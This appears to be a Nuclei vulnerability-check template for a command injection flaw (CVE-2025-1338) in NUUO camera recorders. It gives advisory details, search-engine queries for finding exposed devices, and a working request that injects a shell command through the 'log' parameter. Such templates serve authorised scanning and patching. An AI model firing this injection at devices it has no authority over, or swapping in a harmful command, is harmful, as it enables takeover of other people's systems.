id: CVE-2025-1338 info: name: NUUO Camera <=20250203 - OS Command Injection author: Ark severity: critical description: | NUUO Camera up to 20250203 contains a command injection caused by manipulation of the 'log' argument in /handle_config.php, letting remote attackers execute arbitrary commands, exploit requires remote access. impact: | Remote attackers can execute arbitrary commands on the system, potentially leading to full system compromise. remediation: | Update to the latest version of NUUO Camera or apply security patches provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-1338 - https://github.com/advisories/GHSA-vw58-vgp6-39qx - https://dbugs.ptsecurity.com/vulnerability/CVE-2025-1338 classification: cve-id: CVE-2025-1338 epss-score: 0.51397 epss-percentile: 0.98829 cwe-id: CWE-78 metadata: verified: true max-request: 1 shodan-query: http.title:"Network Video Recorder Login" fofa-query: title="Network Video Recorder Login" || body="www.nuuo.com" tags: cve,cve2025,nuuo,camera,rce,cmdi,intrusive,vkev http: - raw: - | GET /handle_config.php?log=;id; HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "/mtd/block4/log/", "uid=", "gid=")' condition: and # digest: 4a0a0047304502202b2270f78fe6a50a941de65b2223357779474ffd7a65decd55e80aa9f7499c35022100b7432831fc11a5aa61dad62d5498c7847cc3f60f97cec222f2d946757f3aad06:922c64590222798bb761d5b6d8e72950